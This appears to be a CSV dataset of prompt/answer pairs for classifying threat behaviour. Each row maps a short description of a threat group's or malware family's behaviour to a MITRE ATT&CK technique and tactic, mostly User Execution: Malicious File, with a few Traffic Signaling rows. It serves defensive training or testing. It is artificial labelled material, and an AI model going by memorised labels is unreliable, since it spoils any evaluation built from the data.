+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN4 has lured victims to launch malicious attachments delivered via spearphishing emails (often sent from compromised accounts).,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN6 has used malicious documents to lure victims into allowing execution of PowerShell scripts.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 lured victims to double-click on images in the attachments they sent which would then execute the hidden LNK file.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN8 has used malicious e-mail attachments to lure victims into executing malware.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ferocious Kitten has attempted to convince victims to enable malicious content within a spearphishing email by including an odd decoy message.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gallmaker sent victims a lure document with a warning that asked victims to “enable content” for execution.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gamaredon Group has attempted to get users to click on Office attachments with malicious macros embedded.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gorgon Group attempted to get users to launch malicious Microsoft Office attachments delivered via spearphishing emails.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HEXANE has relied on victim's executing malicious file attachments delivered via email or embedded within actor-controlled websites to deliver malware.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Higaisa used malicious e-mail attachments to lure victims into executing LNK files.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Inception lured victims into clicking malicious files for machine reconnaissance and to execute malware.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: IndigoZebra sent spearphishing emails containing malicious attachments that urged recipients to review modifications in the file which would trigger the attack.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Indrik Spider has attempted to get users to click on a malicious zipped file.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has used attempted to lure victims into opening malicious e-mail attachments.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has attempted to get users to launch a malicious Microsoft Word attachment delivered via a spearphishing email.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LazyScripter has lured users to open malicious email attachments.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leviathan has sent spearphishing attachments attempting to get a user to click.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Machete has relied on users opening malicious attachments delivered through spearphishing to execute malware.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has attempted to lure victims into opening malicious email attachments.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Malteiro has relied on users to execute .zip file attachments containing malicious URLs.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mofang's malicious spearphishing attachments required a user to open the file after receiving.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Molerats has sent malicious files via email that tricked users into clicking Enable Content to run an embedded macro and to download malicious archives.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has attempted to get users to open malicious PDF attachment and to enable macros and launch malicious Microsoft Word documents delivered via spearphishing emails.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustang Panda has sent malicious files requiring direct victim interaction to execute.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Naikon has convinced victims to open malicious attachments to execute malware.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Nomadic Octopus as attempted to lure victims into clicking on malicious attachments within spearphishing emails.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has delivered macro-enabled documents that required targets to click the ""enable content"" button to execute the payload on the system.","Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PLATINUM has attempted to get users to open malicious files by sending spearphishing emails with attachments to victims.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PROMETHIUM has attempted to get users to execute compromised installation files for legitimate software including compression applications, security software, browsers, file recovery applications, and other tools and utilities.","Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Patchwork embedded a malicious macro in a Word document and lured the victim to click on an icon to execute the malware.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RTM has attempted to lure victims into opening e-mail attachments to execute malicious code.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rancor attempted to get users to click on an embedded macro within a Microsoft Office Excel document to launch their malware.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team has tricked unwitting recipients into clicking on spearphishing attachments and enabling malicious macros embedded within files.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SideCopy has attempted to lure victims into clicking on malicious embedded archive files sent via spearphishing campaigns.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sidewinder has lured targets to click on malicious files to gain execution in the target environment.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Silence attempts to get users to launch malicious attachments delivered via spearphishing emails.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA2541 has used macro-enabled MS Word documents to lure victims into executing malicious payloads.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA459 has attempted to get victims to open malicious Microsoft Word attachment sent via spearphishing.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA505 has used lures to get users to enable content in malicious attachments and execute malicious files contained in archives. For example, TA505 makes their malware look like legitimate Microsoft Word documents, .pdf and/or .lnk files.","Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA551 has prompted users to enable macros within spearphishing attachments to install malware.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The White Company has used phishing lure documents that trick users into opening them and infecting their computers.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-3390 has lured victims into opening malicious files containing malware.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tonto Team has relied on user interaction to open their malicious RTF documents.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Transparent Tribe has used weaponized documents in e-mail to compromise targeted systems.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tropic Trooper has lured victims into executing malware via malicious e-mail attachments.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WIRTE has attempted to lure users into opening malicious MS Word and Excel files to execute malicious payloads.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Whitefly has used malicious .exe or .dll files disguised as documents or images.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Windshift has used e-mail attachments to lure victims into executing malicious code.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has lured victims to execute malware with spearphishing attachments containing macros to download either Emotet, Bokbot, TrickBot, or Bazar.","Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: admin@338 has attempted to get victims to launch malicious Microsoft Word attachments delivered via spearphishing emails.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: menuPass has attempted to get victims to open malicious files such as Windows Shortcuts (.lnk) and/or Microsoft Office documents, sent via email as part of spearphishing campaigns.","Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Agent Tesla has been executed through malicious e-mail attachments,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleJeus has required user execution of a malicious MSI installer.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleSeed can achieve execution through users running malicious file attachments distributed via email.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Astaroth has used malicious files including VBS, LNK, and HTML for execution.","Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADFLICK has relied upon users clicking on a malicious attachment delivered through spearphishing.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BLINDINGCAN has lured victims into executing malicious macros embedded within Microsoft Office documents.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bad Rabbit has been executed through user installation of an executable disguised as a flash installer.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bandook has used lure documents to convince the user to enable macros.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bisonal has relied on users to execute malicious file attachments delivered via spearphishing emails.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Black Basta has been downloaded and executed from malicious Excel files.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BoomBox has gained execution through user interaction with a malicious file.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Brute Ratel C4 has gained execution through users opening malicious documents.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bumblebee has relied upon a user opening an ISO file to enable execution of malicious shortcut files and DLLs.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bundlore has attempted to get users to execute a malicious .app file that looks like a Flash Player update.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CARROTBALL has been executed through users being lured into opening malicious e-mail attachments.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CSPY Downloader has been delivered via malicious documents with embedded macros.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cardinal RAT lures victims into executing malicious macros embedded within Microsoft Excel documents.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chaes requires the user to click on the malicious Word document to execute the next part of the attack.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Clambling has gained execution through luring victims into opening malicious files.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DanBot has relied on victims' opening a malicious file for initial execution.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkGate initial infection payloads can masquerade as pirated media content requiring user interaction for code execution. DarkGate is distributed through phishing links to VBS or MSI objects requiring user interaction for execution.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkTortilla has relied on a user to open a malicious document or archived file delivered via email for initial execution.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Disco has been executed through inducing user interaction with malicious .zip and .msi files.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DnsSystem has lured victims into opening macro-enabled Word documents for execution.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dridex has relied upon users clicking on a malicious attachment delivered through spearphishing.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emotet has relied upon users clicking on a malicious attachment delivered through spearphishing.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EnvyScout has been executed through malicious files attached to e-mails.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Flagpro has relied on users clicking a malicious attachment delivered through spearphishing.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Grandoreiro has infected victims via malicious attachments.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The GuLoader executable has been retrieved via embedded macros in malicious Word documents.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hancitor has used malicious Microsoft Word documents, sent via email, which prompted the victim to enable macros.","Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Heyoka Backdoor has been spread through malicious document lures.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: IcedID has been executed through Word documents with malicious embedded macros.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole can deliver trojanized versions of software and documents, relying on user execution.","Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: JCry has achieved execution by luring users to click on a file that appeared to be an Adobe Flash Player update installer.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: JSS Loader has been executed through malicious attachments contained in spearphishing emails.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Javali has achieved execution through victims opening malicious attachments, including MSI files with embedded VBScript.","Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KGH_SPY has been spread through Word documents containing malicious macros.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KOCTOPUS has relied on victims clicking a malicious document for execution.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KONNI has relied on a victim to enable malicious macros within an attachment delivered via email.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KOPILUWAK has gained execution through malicious attachments.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kerrdown has gained execution through victims opening malicious files.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lokibot has tricked recipients into enabling malicious macros by getting victims to click ""enable content"" in email attachments.","Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metamorfo requires the user to double-click the executable to run the malicious HTA file or to download a malicious installer.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mispadu has relied on users to execute malicious files in order to gain execution on victim machines.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mongall has relied on a user opening a malicious document for execution.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NETWIRE has been executed through luring victims into opening malicious documents.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NativeZone can display an RTF document to the user to enable execution of Cobalt Strike stage shellcode.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ninja has gained execution through victims opening malicious executable files embedded in zip archives.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OSX/Shlayer has relied on users mounting and executing a malicious DMG file.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Octopus has relied upon users clicking on a malicious attachment delivered through spearphishing.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OutSteel has relied on a user to execute a malicious attachment delivered via spearphishing.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PLEAD has been executed via malicious e-mail attachments.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoetRAT has used spearphishing attachments to infect victims.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pony has attempted to lure targets into downloading an attached executable (ZIP, RAR, or CAB archives) or document (PDF or other MS Office format).","Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot has gained execution through users opening malicious attachments.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: REvil has been executed via malicious MS Word e-mail attachments.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ROKRAT has relied upon users clicking on a malicious attachment delivered through spearphishing.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RTM has relied on users opening malicious email attachments, decompressing the attached archive, and double-clicking the executable within.","Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ramsay has been executed through malicious e-mail attachments.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rifdoor has been executed from malicious Excel or Word documents containing macros.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SQLRat relies on users clicking on an embedded image to execute the scripts.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: STARWHALE has relied on victims opening a malicious Excel file for execution.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Some SUGARDUMP variants required a user to enable a macro within a malicious .xls file for execution.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SVCReady has relied on users clicking a malicious attachment delivered through spearphishing.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SYSCON has been executed by luring victims to open malicious e-mail attachments.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Saint Bot has relied upon users to execute a malicious attachment delivered via spearphishing.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Snip3 can gain execution through the download of visual basic files.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Squirrelwaffle has relied on users enabling malicious macros within Microsoft Excel and Word attachments.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StrongPity has been executed via compromised installation files for legitimate software including compression applications, security software, browsers, file recovery applications, and other tools and utilities.","Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A Word document delivering TYPEFRAME prompts the user to enable macro execution.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Taidoor has relied upon a victim to click on a malicious email attachment.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ThreatNeedle relies on a victim to click on a malicious document for initial execution.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot has attempted to get users to launch malicious documents to deliver its payload.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Valak has been executed via Microsoft Word documents containing malicious macros.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WarzoneRAT has relied on a victim to open a malicious attachment within an email for execution.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Woody RAT has relied on users opening a malicious email attachment for execution.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZxxZ has relied on victims to open a malicious attachment delivered via email.,"Tecnique: T1204.002 User Execution: Malicious File, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has relied on users to download and execute malicious Docker images.,"Tecnique: T1204.003 User Execution: Malicious Image, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Cutting Edge, threat actors sent a magic 48-byte sequence to enable the PITSOCK backdoor to communicate via the `/tmp/clientsDownload.sock` socket.","Tecnique: T1205 Traffic Signaling, Tactic: TA0011 Command and Control TA0005 Defense Evasion TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BUSHWALK can modify the `DSUserAgentCap.pm` Perl module on Ivanti Connect Secure VPNs and either activate or deactivate depending on the value of the user agent in incoming HTTP requests.,"Tecnique: T1205 Traffic Signaling, Tactic: TA0011 Command and Control TA0005 Defense Evasion TA0003 Persistence "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chaos provides a reverse shell is triggered upon receipt of a packet with a special string, sent to any port.","Tecnique: T1205 Traffic Signaling, Tactic: TA0011 Command and Control TA0005 Defense Evasion TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kobalos is triggered by an incoming TCP connection to a legitimate service from a specific source port.,"Tecnique: T1205 Traffic Signaling, Tactic: TA0011 Command and Control TA0005 Defense Evasion TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pandora can identify if incoming HTTP traffic contains a token and if so it will intercept the traffic and process the received command.,"Tecnique: T1205 Traffic Signaling, Tactic: TA0011 Command and Control TA0005 Defense Evasion TA0003 Persistence "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Penquin will connect to C2 only after sniffing a ""magic packet"" value in TCP or UDP packets matching specific conditions.","Tecnique: T1205 Traffic Signaling, Tactic: TA0011 Command and Control TA0005 Defense Evasion TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ryuk has used Wake-on-Lan to power on turned off systems for lateral movement.,"Tecnique: T1205 Traffic Signaling, Tactic: TA0011 Command and Control TA0005 Defense Evasion TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SYNful Knock can be sent instructions via special packets to change its functionality. Code for new functionality can be included in these messages.,"Tecnique: T1205 Traffic Signaling, Tactic: TA0011 Command and Control TA0005 Defense Evasion TA0003 Persistence "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Umbreon provides additional access using its backdoor Espeon, providing a reverse shell upon receipt of a special packet.","Tecnique: T1205 Traffic Signaling, Tactic: TA0011 Command and Control TA0005 Defense Evasion TA0003 Persistence "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Uroburos can intercept the first client to server packet in the 3-way TCP handshake to determine if the packet contains the correct unique value for a specific Uroburos implant. If the value does not match, the packet and the rest of the TCP session are passed to the legitimate listening application.","Tecnique: T1205 Traffic Signaling, Tactic: TA0011 Command and Control TA0005 Defense Evasion TA0003 Persistence "
